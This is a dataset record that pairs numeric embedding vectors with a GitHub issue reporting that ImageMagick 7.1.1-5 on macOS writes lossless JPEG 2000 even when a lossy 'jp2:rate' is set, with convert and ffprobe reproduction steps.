-0.012080779299139977, 0.002751248423010111, -0.008112003095448017, -0.003445420879870653, -0.012429682537913322, 0.016718287020921707, 0.01554073765873909, -0.005782346706837416, -0.0048592062667012215, 0.006065830588340759, -0.01018361747264862, 0.015104608610272408, -0.025949688628315926, 0.0034327004104852676, -0.00825737975537777, 0.010140004567801952, -0.006051293108612299, 0.0011621026787906885, -0.0010730596259236336, -0.018404653295874596, -0.012226155959069729, 0.0009163256618194282, 0.00863535888493061, 0.00889703631401062, -0.017634157091379166, 0.008649895898997784, -0.007595917209982872, 0.014784780330955982, -0.02365274168550968, 0.014399533160030842, -0.00973295047879219, -0.02830478549003601, 0.006323873531073332, -0.031488530337810516, 0.00017195302643813193, 0.007381487172096968, -0.0027712376322597265, -0.002831205492839217, -0.019058845937252045, -0.004128689877688885, -0.007421465590596199, -0.008519057184457779, 0.006411099340766668, -0.0186954066157341, 0.00698170205578208, 0.0016500222263857722, 0.014036091975867748, -0.004815593361854553, 0.014741167426109314, 0.02908981963992119, 0.004437614697962999, 0.01760508306324482, -0.01470482349395752, -0.0024750332813709974, -0.02539725787937641, -0.0064837876707315445, 0.01993110589683056, -0.005706023890525103, -0.002720355987548828, 0.024859365075826645, -0.0032709690276533365, 0.005346217192709446, 0.01318563986569643, -0.01799759827554226, 0.010343531146645546, -0.012604134157299995, -0.007777637802064419, 0.01961127668619156, 0.006956261117011309, -0.0019007965456694365, 0.013934328220784664, 0.010525251738727093, 0.008976993151009083, -0.005186303053051233, -0.011906327679753304, -0.011717338114976883, 0.01299665030092001, 0.013265596702694893, -0.010161810554564, -0.017445169389247894, 0.01702357642352581, -0.009471273049712181, -0.008809810504317284, -0.00816288497298956, -0.0021261300425976515, -0.010096391662955284, -0.014915619045495987, -0.0039360662922263145, -0.004143227357417345, -0.007305164355784655, -0.009943746030330658, 0.021443020552396774, 0.014268694445490837, -0.013236521743237972, 0.0006537395529448986, 0.02083243802189827, 0.013629037886857986, -0.008853423409163952, 0.014857468195259571, 0.0003514020354487002, 0.01812843792140484, 0.025746161118149757, -0.005618798080831766, 0.002831205492839217, 0.0035435499157756567, -0.001552801695652306, 0.01753239519894123, -0.00037048268131911755, -0.00818469189107418, 0.00033936306135728955, 0.0021788289304822683, 0.001795398653484881, 0.005062733311206102, -0.005182669032365084, 0.009631186723709106, -0.015220909379422665, -0.007937551476061344, 0.010198154486715794, 0.02173377200961113, 0.0007714035455137491, -0.0023332913406193256, 0.0021224955562502146, -0.0018362856935709715, 0.0029747646767646074, 0.0341925323009491, 0.0018644523806869984, -0.02526642009615898, -0.016732824966311455, -0.004771980457007885, -0.019393213093280792, 0.02424878440797329, 0.033116746693849564, 0.052131980657577515, 0.039949435740709305, 0.014523102901875973, -0.0035889800637960434, -0.015046457760035992, -0.014661210589110851, -0.0072288415394723415, -0.001917151384986937, 0.003608969273045659, 0.004561184905469418, -0.007813981734216213, 0.005647873505949974, 0.0010757853742688894, -0.008817078545689583, -0.012298843823373318, 0.004205012694001198, -0.008911573328077793, -0.004430346190929413, -0.015308135189116001, -0.008715315721929073, -0.026211366057395935, 0.030151067301630974, -0.013171101920306683, -0.006985336076468229, -0.0053389486856758595, 0.010314456187188625, 0.0035326466895639896, -0.012008091434836388, -0.000008986647117126267, -0.014675748534500599, 0.024612225592136383, 0.003917894326150417, 0.014028823003172874, 0.001281129545532167, 0.01380348950624466, 0.009565767832100391, -0.006167593877762556, 0.009027875028550625, 0.008875229395925999, -0.006094906013458967, -0.020221857354044914, -0.01428323145955801, -0.022402504459023476, -0.01170280110090971, 0.00018285626720171422, -0.016616523265838623, -0.009725681506097317, -0.0040850769728422165, 0.006763637065887451, 0.003083796938881278, 0.002280592452734709, 0.02257695607841015, 0.002020732033997774, 0.006349314469844103, -0.008664433844387531, 0.000004670785074267769, -0.01080146711319685, 0.007014411501586437, 0.006498325150460005, 0.034018080681562424, -0.00763953011482954, -0.0021115923300385475, -0.00934770330786705, -0.004212281201034784, -0.010961380787193775, 0.0021152268163859844, -0.003750711213797331, 0.014043360948562622, 0.008569939061999321, 0.03236078843474388, 0.01137570384889841, -0.001242059632204473, -0.00790120754390955, 0.014944694936275482, -0.02701093629002571, -0.01972757838666439, 0.031895581632852554, -0.012356994673609734, -0.019102459773421288, 0.013272865675389767, 0.012684090994298458, -0.014835662208497524, -0.013658112846314907, -0.004521206021308899, -0.014552177861332893, 0.017823146656155586, -0.022082675248384476, -0.013658112846314907, -0.047363631427288055, -0.007726755924522877, -0.0014319575857371092, 0.01261140312999487, -0.02121041715145111, -0.011441122740507126, -0.007806712761521339, 0.012771316803991795, -0.002783958101645112, 0.009027875028550625, 0.009580304846167564, -0.011237596161663532, 0.0022696892265230417, -0.010627015493810177, -0.02257695607841015, -0.0020643449388444424, -0.0004824679344892502, -0.020396308973431587, 0.007417831104248762, 0.0018353770719841123, 0.0012157101882621646, -0.00332003366202116, -0.005211743991822004, 0.00012379710096865892, -0.009500348009169102, -0.0057387338019907475, 0.004946432076394558, 0.015758803114295006, -0.00880254153162241, 0.014777511358261108, 0.02308577299118042, 0.00037911441177129745, -0.007123443763703108, -0.02102142758667469, 0.015831490978598595, 0.0008927019662223756, 0.00026372188585810363, 0.0004901910433545709, -0.02122495509684086, 0.02469945140182972, 0.007704949472099543, 0.0008122906438075006, 0.0021642912179231644, -0.013839833438396454, 0.009587573818862438, 0.012204349040985107, 0.009791101329028606, -0.005549744237214327, 0.020876051858067513, 0.0012747693108394742, 0.0018235653406009078, 0.00002627848880365491, -0.028740914538502693, 0.04436887800693512, -0.003856109222397208, -0.025324570015072823, -0.01586056500673294, 0.00906421896070242, 0.0011003176914528012, 0.003461775602772832, -0.03532646596431732, 0.0112812090665102, 0.011622843332588673, 0.0046556792221963406, 0.008010240271687508, 0.00698170205578208, -0.008788003586232662, 0.015395360998809338, -0.014145124703645706, 0.008010240271687508, 0.0004611157928593457, -0.011644650250673294, 0.013498199172317982, -0.009689337573945522, 0.005357120651751757, 0.010372606106102467, 0.009136906825006008, -0.002146119251847267, 0.008141078986227512, 0.01767777092754841, 0.017576007172465324, 0.012138930149376392, -0.0007818524609319866, -0.013687188737094402, -0.012887618504464626, 0.0019789363723248243, 0.00799570232629776, 0.015409898944199085, -0.007501422427594662, 0.0015246350085362792, -0.002031635260209441, 0.00691264821216464, 0.011099488474428654, 0.0036780231166630983, -0.011688263155519962, 0.011971746571362019, -0.01044529490172863, -0.00782851967960596, -0.017576007172465324, 0.007214304059743881, 0.01638392172753811, 0.013941597193479538, -0.006102174520492554, -0.014057897962629795, 0.015744265168905258, -0.0067345621064305305, -0.00873712170869112, 0.001060339156538248, -0.0007754922844469547, -0.0010975918266922235, 0.0451539121568203, -0.0064547122456133366, -0.0015855113742873073, -0.00935497134923935, 0.005244453903287649, 0.01959673874080181 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.1-5 ### Operating system MacOS ### Operating system, version and so on macOS 13.3 (Ventura) ### Description I can't seem to get ImageMagick to create a lossy jpeg2000. Jpeg2000 supports both lossless and lossy compression, but ImageMagick is always using lossless. The [jpeg2000 format docs](http://patrickdieudonne.com/ImageMagick-6.7.0-2/www/jp2.html) are not explicit about how to choose lossy vs lossless, but I *think* from the first example shown that it's supposed to happen automatically based on the value of `jp2:rate` encoding option: > * compression is lossy at 64:1 > `-define jp2:rate=0.015625` However, when I try this same command, the output file is reported to be lossless (using ffprobe). ### Steps to Reproduce ``` % convert wizard.png -define jp2:cblkwidth=64 -define jp2:cblkheight=32 \ -define jp2:nomct -define jp2:numrlvls=4 -define jp2:rate=0.015625 wizard.jpc ``` ``` % ffprobe wizard.jpc 2>&1 | grep "Stream" Stream #0:0: Video: jpeg2000, rgb24, 940x1250, lossless, 25 fps, 25 tbr, 25 tbn ``` ### Images ![wizard](https://user-images.githubusercontent.com/188955/229563904-90a3306f-3583-475b-9b22-711e10a59966.png) [wizard.jpc.zip](https://github.com/ImageMagick/ImageMagick/files/11140172/wizard.jpc.zip)
Unable to save image as lossy jpeg2000
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6220/comments
6
2023-04-03T15:59:09
2023-09-22T12:07:16Z
https://github.com/ImageMagick/ImageMagick/issues/6220
1,652,347,484
6,220
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Unable to save image as lossy jpeg2000 Issue date: --- start body --- ### ImageMagick version 7.1.1-5 ### Operating system MacOS ### Operating system, version and so on macOS 13.3 (Ventura) ### Description I can't seem to get ImageMagick to create a lossy jpeg2000. Jpeg2000 supports both lossless and lossy compression, but ImageMagick is always using lossless. The [jpeg2000 format docs](http://patrickdieudonne.com/ImageMagick-6.7.0-2/www/jp2.html) are not explicit about how to choose lossy vs lossless, but I *think* from the first example shown that it's supposed to happen automatically based on the value of `jp2:rate` encoding option: > * compression is lossy at 64:1 > `-define jp2:rate=0.015625` However, when I try this same command, the output file is reported to be lossless (using ffprobe). ### Steps to Reproduce ``` % convert wizard.png -define jp2:cblkwidth=64 -define jp2:cblkheight=32 \ -define jp2:nomct -define jp2:numrlvls=4 -define jp2:rate=0.015625 wizard.jpc ``` ``` % ffprobe wizard.jpc 2>&1 | grep "Stream" Stream #0:0: Video: jpeg2000, rgb24, 940x1250, lossless, 25 fps, 25 tbr, 25 tbn ``` ### Images ![wizard](https://user-images.githubusercontent.com/188955/229563904-90a3306f-3583-475b-9b22-711e10a59966.png) [wizard.jpc.zip](https://github.com/ImageMagick/ImageMagick/files/11140172/wizard.jpc.zip) --- end body ---
1,454
[ -0.015445356257259846, 0.004502572119235992, -0.011702505871653557, 0.03186650201678276, 0.002845472190529108, 0.016532665118575096, 0.01343801710754633, 0.035212066024541855, -0.027447568252682686, 0.0489288792014122, 0.03883642703294754, -0.029887042939662933, -0.0060533806681632996, 0.013173160143196583, 0.015222318470478058, -0.014197738841176033, -0.02095159702003002, 0.007095384411513805, -0.006949016358703375, -0.00042756140464916825, -0.01304073166102171, -0.003274122718721628, 0.014246528968214989, 0.016992678865790367, 0.014497445896267891, 0.016476904973387718, -0.011089152656495571, 0.02623480185866356, -0.012873453088104725, -0.019223056733608246, 0.04474692419171333, 0.020867958664894104, -0.00691068172454834, 0.03002644143998623, 0.03596481680870056, -0.0008620927110314369, 0.04733973741531372, 0.036745451390743256, 0.02932944893836975, 0.020630981773138046, -0.018177567049860954, -0.05955104902386665, 0.0063147530891001225, 0.04237715154886246, -0.002704331185668707, -0.02758696675300598, -0.01437198743224144, 0.017592092975974083, -0.04820400848984718, -0.008175723254680634, 0.006394906900823116, -0.029440967366099358, -0.023530470207333565, -0.016978738829493523, 0.000014715800716658123, -0.042154110968112946, 0.026262681931257248, 0.02464565820991993, -0.005457452032715082, 0.018763041123747826, -0.019738830626010895, 0.052887797355651855, 0.024171702563762665, 0.030082199722528458, -0.0013347407802939415, -0.032675012946128845, 0.0033542767632752657, 0.0504622645676136, -0.005067136138677597, -0.009193331934511662, -0.016351446509361267, -0.012824663892388344, 0.0054400269873440266, 0.04920767620205879, 0.03537934273481369, -0.0059662568382918835, 0.04825976863503456, 0.013458927161991596, -0.024199582636356354, 0.025621447712183, -0.05188412964344025, 0.011904633603990078, -0.04672638326883316, -0.002956991083920002, 0.013340438716113567, 0.011995242908596992, -0.03222893923521042, -0.04605726897716522, 0.012239189818501472, 0.03256349265575409, -0.001100377063266933, 0.0351005457341671, -0.0026311471592634916, -0.022178305312991142, 0.019641252234578133, 0.02366986870765686, -0.02049158327281475, 0.002352349925786257, -0.026374200358986855, -0.04795309156179428, 0.004544391762465239, 0.002746150828897953, -0.0074369111098349094, 0.01143764890730381, 0.005244869273155928, -0.02106311544775963, 0.01437198743224144, -0.022610438987612724, 0.030054321512579918, 0.1022069975733757, 0.0063252076506614685, 0.02633238025009632, -0.02351653017103672, -0.01727147586643696, -0.009381520561873913, 0.01347286719828844, -0.025049913674592972, -0.0023488651495426893, 0.021913446485996246, -0.013249829411506653, -0.05489513650536537, -0.039310380816459656, -0.010921874083578587, 0.01469260361045599, -0.028939133509993553, 0.03724728524684906, 0.015431416220963001, 0.016895100474357605, -0.0011962135322391987, -0.02113281562924385, -0.04865008220076561, -0.018944257870316505, 0.015612633898854256, -0.005805948283523321, -0.004084376618266106, -0.0042690797708928585, -0.025983884930610657, 0.007771467324346304, -0.050685301423072815, 0.007973595522344112, -0.04407781362533569, -0.03473811224102974, 0.048120368272066116, -0.0018661976791918278, -0.003408293705433607, -0.003326397156342864, -0.010162152349948883, -0.004213320091366768, 0.028911253437399864, -0.011974332854151726, 0.0017773311119526625, -0.004812733735889196, -0.007994504645466805, 0.0032758652232587337, 0.05012770742177963, 0.02364198863506317, -0.022303763777017593, 0.0047012148424983025, 0.013221949338912964, -0.00039663235656917095, -0.023920785635709763, -0.01718783751130104, -0.0014410321600735188, 0.0348496288061142, 0.008830896578729153, -0.006896741688251495, -0.003941493108868599, 0.024115944281220436, 0.007841167040169239, 0.012559806928038597, 0.0017590350471436977, 0.007422971073538065, 0.004199380520731211, -0.02871609479188919, -0.01859576255083084, 0.008384821005165577, 0.005624730139970779, 0.01852606236934662, 0.01452532596886158, -0.03546298295259476, 0.023683808743953705, 0.01590537093579769, 0.007450850680470467, -0.01623992808163166, 0.04031405225396156, -0.03245197609066963, 0.027656666934490204, -0.011932513676583767, 0.03724728524684906, -0.015459295362234116, 0.006715523544698954, 0.03629937395453453, 0.026318440213799477, -0.024422621354460716, 0.009012114256620407, 0.01773149147629738, -0.021146755665540695, -0.062060222029685974, -0.002857669722288847, 0.00964637752622366, 0.03214529901742935, -0.024046244099736214, -0.027698485180735588, -0.03733092173933983, -0.004903343040496111, 0.00901908427476883, -0.0126155661419034, 0.02210860513150692, 0.00961849745362997, -0.027600906789302826, -0.023628048598766327, -0.037135764956474304, 0.0244644396007061, -0.02569114789366722, -0.012120701372623444, 0.01304073166102171, -0.012511016800999641, 0.026276620104908943, -0.04014677181839943, 0.014804122969508171, 0.005656094755977392, -0.01515261922031641, -0.009318791329860687, -0.008078143931925297, -0.04045344889163971, -0.04580635204911232, -0.011381888762116432, -0.011932513676583767, -0.03161558508872986, 0.019529731944203377, 0.03735880181193352, -0.018721221014857292, 0.003159119049087167, 0.022164365276694298, 0.011110061779618263, -0.029245808720588684, 0.0008067689486779273, -0.0059000421315431595, -0.012399498373270035, -0.0013530368451029062, 0.01168159581720829, -0.004934707656502724, -0.011298250406980515, -0.014971400611102581, 0.00932576134800911, 0.023293493315577507, -0.01834484562277794, -0.02443655952811241, -0.01715995743870735, 0.009472128935158253, -0.0011761749628931284, 0.004436357878148556, 0.00027901484281755984, 0.002871609525755048, -0.03220105916261673, -0.008844835683703423, 0.03289804980158806, 0.0009853732772171497, -0.007008260581642389, -0.042516548186540604, 0.0012406468158587813, 0.03892006725072861, 0.015194438397884369, 0.023460770025849342, 0.05347327142953873, -0.03094647079706192, -0.012594656087458134, 0.021272214129567146, 0.03214529901742935, 0.004046041984111071, -0.00414362084120512, -0.008754227310419083, 0.011221581138670444, 0.013528626412153244, -0.017592092975974083, -0.009946084581315517, -0.02412988431751728, -0.010859144851565361, 0.020742500200867653, -0.015431416220963001, 0.011639776639640331, 0.04299050197005272, -0.00926303118467331, 0.005189110059291124, 0.004973042290657759, -0.01770361140370369, 0.018247265368700027, -0.022889235988259315, -0.07165084034204483, 0.009074843488633633, -0.020895838737487793, 0.012601626105606556, -0.013751664198935032, -0.018790921196341515, 0.002165904501453042, -0.001414023688994348, -0.03471023216843605, 0.009123632684350014, 0.002704331185668707, 0.0067120385356247425, 0.0011317416792735457, -0.003434431040659547, 0.022164365276694298, -0.03231257572770119, -0.0011883723782375455, 0.010559437796473503, 0.014497445896267891, 0.03465447202324867, 0.002324470318853855, -0.0376654788851738, 0.04257230833172798, 0.013382257893681526, 0.005182140041142702, -0.01828908547759056, -0.005673519801348448, -0.011486438103020191, 0.05425390228629112, -0.022178305312991142, 0.01278284378349781, -0.019710950553417206, -0.004690760280936956, 0.0024481865111738443, -0.035212066024541855, -0.0010062830988317728, 0.007381151430308819, -0.00781328696757555, -0.04315778240561485, 0.011779175139963627, -0.02223406359553337, 0.02106311544775963, 0.021690409630537033, -0.030416756868362427, -0.0009836307726800442, 0.016867220401763916, 0.031030111014842987, -0.023586230352520943, -0.025844484567642212, 0.008733317255973816, 0.03261925280094147, 0.01284557394683361, -0.010838234797120094, -0.025844484567642212, 0.001598726725205779, -0.006001106463372707, 0.05771098658442497, -0.006969925947487354, -0.01039912924170494, 0.04536027833819389, 0.043743256479501724, 0.0014166374458000064, 0.000996699440293014, 0.045973632484674454, -0.019027898088097572, -0.019223056733608246, -0.0028960041236132383, -0.010663987137377262, 0.01621204800903797, -0.006443696562200785, -0.0198503490537405, -0.019641252234578133, 0.019432153552770615, -0.019864289090037346, -0.010294580832123756, -0.0003197453625034541, -0.0019184721168130636, 0.03242409601807594, -0.018247265368700027, -0.007179023697972298, -0.014169859699904919, -0.02244316227734089, 0.008106024004518986, 0.015361716970801353, -0.045945752412080765, 0.05871465802192688, -0.032953809946775436, -0.0060533806681632996, -0.002218178939074278, -0.001946351840160787, -0.029245808720588684, 0.022610438987612724, -0.04142924025654793, 0.00201082369312644, 0.041234083473682404, -0.037721239030361176, 0.004213320091366768, 0.019125476479530334, -0.012392528355121613, -0.005823373328894377, 0.01215555053204298, -0.020073385909199715, -0.026095403358340263, -0.017132077366113663, -0.04895675927400589, -0.03733092173933983, -0.04667062312364578, 0.06752464175224304, 0.036438774317502975, -0.033567164093256, -0.004007707349956036, -0.003812549402937293, -0.01727147586643696, -0.03384596109390259, 0.009520919062197208, 0.02085401862859726, -0.019975807517766953, 0.060443196445703506, -0.0022146939300000668, -0.022498920559883118, -0.030416756868362427, -0.007896926254034042, 0.0011700763134285808, 0.037749119102954865, -0.0067503731697797775, 0.02177404798567295, -0.023865027353167534, 0.01328467857092619, 0.0015542934415861964, -0.010963693261146545, 0.011876753531396389, 0.00831512175500393, 0.022331641986966133, 0.006677188910543919, -0.02458989806473255, 0.012030092068016529, 0.017633913084864616, -0.0020526431035250425, 0.020296424627304077, 0.018233327195048332, 0.05364055186510086, -0.016323566436767578, -0.007722678128629923, -0.0021711320150643587, -0.03058403544127941, 0.003627846483141184, -0.0006429756758734584, -0.005025316495448351, -0.03543510288000107, 0.0009853732772171497, -0.00932576134800911, 0.028297899290919304, -0.006509910803288221, 0.02871609479188919, 0.001362620503641665, 0.021202513948082924, 0.0037742150016129017, -0.014497445896267891, -0.02433898113667965, -0.003441401058807969, -0.041568636894226074, -0.008426640182733536, -0.0055515458807349205, 0.0315040647983551, 0.014553205110132694, -0.048454925417900085, 0.03284228965640068, 0.007297512609511614, -0.04142924025654793, 0.004561816342175007, -0.0007383765187114477, -0.016156287863850594, 0.009548798203468323, 0.018205447122454643, -0.0252311322838068, 0.0006255508633330464, -0.0019637765362858772, 0.012622536160051823, -0.008238452486693859, -0.002672966569662094, 0.010852174833416939, -0.02097947709262371, 0.008559068664908409, 0.026652997359633446, 0.055396970361471176, 0.007841167040169239, -0.00726266298443079, 0.029496727511286736, -0.022708019241690636, -0.010364280082285404, 0.04547179862856865, -0.030807072296738625, 0.02182980813086033, -0.07739406079053879, -0.013612265698611736, 0.01923699490725994, 0.019892169162631035, 0.02054734155535698, 0.015584754757583141, 0.00638445233926177, -0.018386663869023323, 0.034570831805467606, -0.012023122049868107, 0.025914184749126434, -0.027712425217032433, -0.016964800655841827, -0.0036243614740669727, 0.03036099672317505, -0.007548430003225803, -0.039644937962293625, 0.0040042223408818245, -0.016783582046628, 0.021537071093916893, -0.0198503490537405, 0.013765604235231876, -0.009897294454276562, 0.016225988045334816, -0.03434779495000839, -0.03384596109390259, 0.02592812478542328, -0.044328730553388596, -0.018874559551477432, 0.005729279015213251, -0.05085257813334465, -0.028116680681705475, -0.025705086067318916, -0.01246222760528326, -0.01253889687359333, 0.03825095295906067, -0.01575203239917755, 0.04103892296552658, 0.0216485895216465, -0.01911153644323349, -0.013340438716113567, 0.007499640341848135, 0.028994891792535782, -0.0026328894309699535, 0.040258292108774185, 0.03886430710554123, -0.010880053974688053, 0.005272748880088329, 0.034905388951301575, 0.01865152269601822, 0.011172791011631489, 0.014776242896914482, 0.010963693261146545, -0.0096045583486557, 0.010015783831477165, -0.03685696795582771, -0.012016152031719685, -0.019766710698604584, -0.0021885568276047707, 0.021718289703130722, 0.008280271664261818, -0.020477643236517906, -0.01394682191312313, -0.0270293727517128, -0.0024952334351837635, -0.050991978496313095, -0.0055410913191735744, -0.027810005471110344, 0.00018818800162989646, -0.01226009987294674, -0.030500395223498344, 0.02116069570183754, 0.0322846956551075, 0.01990610919892788, 0.017438754439353943, 0.03758184239268303, -0.00703265517950058, 0.0015359974931925535, -0.012162520550191402, 0.0036417862866073847, 0.027879703789949417, 0.016435084864497185, 0.03855763003230095, -0.00025222418480552733, -0.023809267207980156, 0.021355852484703064, 0.018818799406290054, -0.06618642061948776, -0.036132097244262695, 0.020756440237164497, -0.0028088800609111786, -0.0379163958132267, -0.022582560777664185, -0.02003156766295433, 0.024868695065379143, 0.01941821351647377, 0.029301568865776062, -0.014413806609809399, 0.0028263048734515905, 0.027057252824306488, -0.005872162524610758, -0.02966400422155857, 0.029831282794475555, 0.012392528355121613, 0.00683401245623827, 0.007179023697972298, -0.025802666321396828, -0.014483505859971046, -0.0029552485793828964, 0.009444249793887138, 0.029273688793182373, 0.0021711320150643587, 0.0039658877067267895, 0.05333387479186058, -0.00019613807671703398, 0.013695904985070229, 0.023014696314930916, 0.02308439463376999, -0.003094647079706192, -0.04887311905622482, 0.0035006452817469835, 0.013528626412153244, 0.018512124195694923, -0.00532850855961442, -0.022457102313637733, 0.033985357731580734, -0.011256430298089981, -0.0015438386471942067, -0.009367580525577068, 0.01788483001291752, 0.01926487497985363, 0.052915677428245544, -0.010566407814621925, 0.001633576350286603, 0.0006865377072244883, 0.001727670431137085, 0.001418379950337112, -0.016825402155518532, -0.008050264790654182, 0.022666199132800102, -0.03250773623585701, -0.008140873163938522, 0.029803402721881866, 0.020937656983733177, 0.024994155392050743, -0.021871628239750862, -0.0061265649273991585, -0.009987903758883476, -0.03760971873998642, 0.01278284378349781, 0.027837883681058884, 0.02049158327281475, -0.011340069584548473, -0.0096045583486557, 0.027963342145085335, 0.013507716357707977, -0.030695553869009018, -0.020784318447113037, -0.01301285158842802, -0.04271170496940613, -0.007764497306197882, -0.013312558643519878, 0.015501115471124649, -0.01371681410819292, -0.0070988694205880165, -0.008008444681763649, 0.013138310052454472, -0.005795493256300688, 0.015417476184666157, -0.040537089109420776, -0.011507348157465458, 0.02177404798567295, 0.03783275932073593, -0.028967011719942093, -0.001667554839514196, 0.024046244099736214, 0.024910515174269676, 0.004446812905371189, -0.006464606150984764, 0.016002949327230453, 0.02571902610361576, 0.002538795582950115, -0.007931775413453579, 0.01469260361045599, 0.03752608224749565, 0.018665460869669914, -0.0028315323870629072, 0.007464790716767311, 0.008112994022667408, 0.016072649508714676, -0.0012685265392065048, 0.00484758336097002, 0.012880423106253147, -0.0021711320150643587, -0.006123079918324947, 0.005070621147751808, -0.0017564212903380394, -0.005617760121822357, 0.028827613219618797, 0.005683974828571081, 0.010210941545665264, 0.007834197022020817, -0.002517885761335492, -0.015417476184666157, 0.0015028902562335134, 0.010085483081638813, 0.015082919970154762, -0.0008673201664350927, -0.04452388733625412, 0.006959470920264721, -0.009102723561227322, -0.003009265521541238, -0.006774768233299255, -0.025035973638296127, 0.026583297178149223, 0.002570160198956728, 0.01137491874396801, 0.000560643442440778, -0.046921540051698685, -0.03730304539203644, 0.018414543941617012, 0.007388121448457241, 0.0004574013873934746, -0.027475448325276375, -0.01923699490725994, 0.008803016506135464, 0.00030123148462735116, -0.02853487618267536, 0.008740287274122238, 0.0013216722290962934, 0.03242409601807594, 0.0037637599743902683, 0.016825402155518532, -0.022317703813314438, 0.03189438208937645, 0.0075972191989421844, -0.01757815293967724, -0.02828395925462246, 0.002303560497239232, 0.016253868117928505, 0.01469260361045599, -0.012943152338266373, -0.05115925520658493, 0.015431416220963001, 0.01324285939335823, 0.007039625197649002, 0.010880053974688053, 0.011305219493806362, 0.019585492089390755, -0.033650804311037064, -0.013905002735555172, 0.013138310052454472, 0.001305989921092987, 0.02697361260652542, 0.020630981773138046, 0.0188327394425869, -0.010726716369390488, 0.043074142187833786, -0.014413806609809399, 0.011549167335033417, -0.022512860596179962, -0.048817362636327744, -0.0064018769189715385, -0.015724152326583862, -0.024143824353814125, 0.00933970045298338, 0.01406531035900116, -0.027656666934490204, 0.018247265368700027, 0.021551011130213737, 0.002239088760688901, 0.0037533051799982786, -0.04538815841078758, -0.0048998580314219, -0.0038787638768553734, 0.0007871660054661334, -0.01434410735964775, 0.02379532717168331, -0.005600335542112589, 0.01426743809133768, -0.024408681318163872, 0.013925911858677864, 0.003030175343155861, 0.008956355042755604, 0.00851724948734045, 0.029190050438046455, -0.0042795343324542046, 0.00961849745362997, 0.017173897475004196, -0.021230394020676613, 0.023265613242983818, -0.013082550838589668, -0.009200301952660084, 0.0028419874142855406, -0.015738092362880707, -0.02971976436674595, -0.014497445896267891, -0.0028332748916000128, 0.022680139169096947, -0.027991222217679024, 0.008642707951366901, -0.018972137942910194, 0.04101104289293289, 0.0069768959656357765, 0.01249010767787695, 0.005070621147751808, 0.0036766359116882086, -0.02136979252099991, 0.00020495938952080905, -0.019669130444526672, -0.0170344989746809, 0.02905065193772316, -0.022457102313637733, 0.004195895511657, -0.004809248726814985, 0.03440355509519577, 0.024868695065379143, 0.002970930887386203, -0.006882802117615938, -0.010789445601403713, 0.024729296565055847, 0.013277708552777767, -0.02287529781460762, -0.031085869297385216, -0.0027200134936720133, -0.03292592987418175, 0.02318197302520275, -0.02167646959424019, 0.05843586102128029, 0.003596481867134571, -0.011814024299383163, -0.005635185167193413, 0.02838153764605522, -0.015236258506774902, -0.0015699758660048246, -0.006771283224225044, -0.018400603905320168, -0.0027182712219655514, 0.0054400269873440266, -0.04165227711200714, 0.0156265739351511, 0.026220861822366714, -0.022972876206040382, -0.04505360126495361, -0.01547323539853096, -0.0006935076089575887, 0.008433610200881958, -0.00519956462085247, 0.019822468981146812, -0.00897726509720087, -0.024994155392050743, -0.01644902490079403, 0.01316619012504816, -0.016170227900147438, 0.007855106145143509, 0.02828395925462246, -0.002528340555727482, -0.051298655569553375, 0.042795345187187195, -0.014929581433534622, 0.012204340659081936, -0.003951948136091232, -0.020603101700544357, 0.056066084653139114, -0.012803753837943077, -0.02449231967329979, 0.006882802117615938, -0.004293474368751049, -0.01467866450548172, 0.011409768834710121, 0.016198107972741127, -0.026346320286393166, 0.019669130444526672, 0.009116663597524166, -0.029914923012256622, -0.007785407360643148, 0.00788995623588562, -0.021941326558589935, -0.024143824353814125, 0.008719377219676971, 0.027559086680412292, -0.010127302259206772, -0.04050920903682709, 0.03348352387547493, -0.03339988365769386, 0.01644902490079403, 0.02174616977572441, 0.010252760723233223, 0.003554662223905325, -0.007910866290330887, -0.0016710397321730852, 0.021049177274107933, -0.005460937041789293, -0.021551011130213737, -0.008733317255973816, -0.026834214106202126, -0.007353271823376417, 0.012817693874239922, -0.0081966333091259, -0.0011631064116954803, 0.004781369119882584, 0.014776242896914482, 0.017313295975327492, 0.003892703680321574, -0.02195526659488678, -0.0009566223598085344, -0.014009551145136356, -0.011827964335680008, -0.0067399186082184315, 0.005171685013920069, 0.009611528366804123, -0.03476599231362343, 0.003871793858706951, -0.0028175925835967064, -0.0008350842399522662, -0.010594287887215614, -0.04859432205557823, -0.004014677368104458, -0.031727101653814316, -0.010970663279294968, -0.007206903304904699, 0.017633913084864616, 0.007778437342494726, 0.011319159530103207, -0.02544022910296917, 0.024115944281220436, 0.014943521469831467, 0.0029970682226121426, -0.02228982374072075, 0.04527663812041283, -0.009597588330507278, 0.010294580832123756, -0.0015229288255795836, 0.0013347407802939415, 0.01911153644323349, -0.038669150322675705, -0.011012483388185501, 0.003089419798925519, 0.055396970361471176, -0.008343001827597618, -0.015459295362234116, 0.016170227900147438, 0.03353928402066231, -0.0007475245511159301, -0.02997068129479885, -0.016797522082924843, 0.01434410735964775, -0.0030528276693075895, 0.0004190668114461005, 0.004997436888515949, -0.008349970914423466, 0.010845204815268517, -0.017898770049214363, 0.00625202339142561, -0.018707280978560448, 0.024115944281220436, 0.0022373462561517954, 0.014427746646106243, -0.011124001815915108, 0.016825402155518532, -0.004687275271862745, -0.006276418454945087, -0.02709907293319702, 0.003899673465639353, 0.006081260275095701, 0.012051002122461796, 0.020630981773138046, -0.022554680705070496, -0.020017627626657486, 0.005649125203490257, 0.0008398760692216456, -0.007652978878468275, 0.005039256531745195, 0.002953506074845791, 0.020742500200867653, -0.026318440213799477, -0.00718599371612072, 0.0024464440066367388, 0.026443898677825928, 0.0024830361362546682, -0.012922242283821106, -0.021077055484056473, -0.014330167323350906, -0.022638319060206413, 0.023042574524879456, -0.044719044119119644, 0.004115741234272718, -0.02318197302520275, -0.015236258506774902, 0.01319407019764185, -0.0022843931801617146, -0.013312558643519878, 0.020115206018090248, 0.006774768233299255, 0.020045507699251175, -0.003889218671247363, -0.0011064757127314806, -0.02813062071800232, -0.014399867504835129, 0.0015978554729372263, -0.042823225259780884, -0.0035180700942873955, -0.004750004503875971, 0.032089538872241974, -0.01721571758389473, 0.015096860006451607, 0.013249829411506653, -0.014650784432888031, -0.00345534086227417, 0.018512124195694923, 0.002162419492378831, 0.023349251598119736, -0.055146053433418274, 0.020895838737487793, -0.003986797761172056, -0.0032305605709552765, 0.0022983329836279154, 0.010963693261146545, -0.015542934648692608, -0.035853300243616104, -0.00115613650996238, -0.013479837216436863, 0.015501115471124649, 0.027391809970140457, 0.02018490619957447, 